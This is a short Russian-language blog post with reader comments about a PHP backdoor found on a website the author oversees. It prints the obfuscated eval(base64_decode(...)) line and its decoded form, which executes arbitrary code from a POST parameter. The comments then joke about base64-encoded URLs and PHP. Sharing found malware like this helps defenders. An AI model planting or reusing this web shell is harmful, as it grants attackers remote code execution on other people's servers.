November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Style Credit

Expand Cut Tags

No cut tags
Tuesday, June 21st, 2011 07:13 am

<?php eval(base64_decode("aWYoaXNzZXQoJну и т.д.")); ?>

После декодирования оно выглядит так:

if(isset($_GET["part"])) {  if($_GET["part"]=="sec")  echo "partgood"; } else if(isset($_POST["ggg"])) {   if($_POST["ggg"]==1)        echo "ok11";  } else if(isset($_POST["main"])) {  eval(urldecode($_POST["main"])); }

 

Оригинал этой записи. Комментировать можно тут или там.

Любые материалы из этого блога запрещается использовать на сайте livejournal.ru в любой форме и любом объёме

Tuesday, June 21st, 2011 07:32 am (UTC)
Это где такое растет?
Tuesday, June 21st, 2011 08:09 am (UTC)
Это на одном подведомственном сайте нашлось. Типа, хакеры приходили, оставили себе заготовочку.
Tuesday, June 21st, 2011 08:02 am (UTC)
шифровальщик.
Tuesday, June 21st, 2011 08:12 am (UTC)
У тут недавно тожн был опыт -- дали сайт, все урлы в котором были вида ?module=aWYoaXNzZXQoJнуSDsfsvdfsdf&a=1&b2=5&s3=m&e22=j.

А в коде проверялось, if base64(GET)=='xxxxx' elif base64(GET)=='yyyyy' elif base64(GET)=='zzzz' и так далее до упора. Аналогично разбирались урлы дальше. Поубывав бы.

Не eval(POST), конечно.
Tuesday, June 21st, 2011 08:19 am (UTC)
ну в общем-то оно принципиально ничем не отличается от типичного ?page=номер, только номер длинный и менее понятный.
А вот за многократное применение base64() надо бить валенком.
Tuesday, June 21st, 2011 08:52 am (UTC)
Да PHPников надо всегда бить валенком, для профилактики :)
Tuesday, June 21st, 2011 09:24 am (UTC)
во-о-от!
Tuesday, June 21st, 2011 09:59 am (UTC)
угу
Tuesday, June 21st, 2011 05:02 pm (UTC)
Сначала надо заказчиков бить, чтоб не хотели "как у всех, на пыхпыхе" и не аргументировали сиё "а где потом мы штангиста на хаскеле найдём на поддержку?"...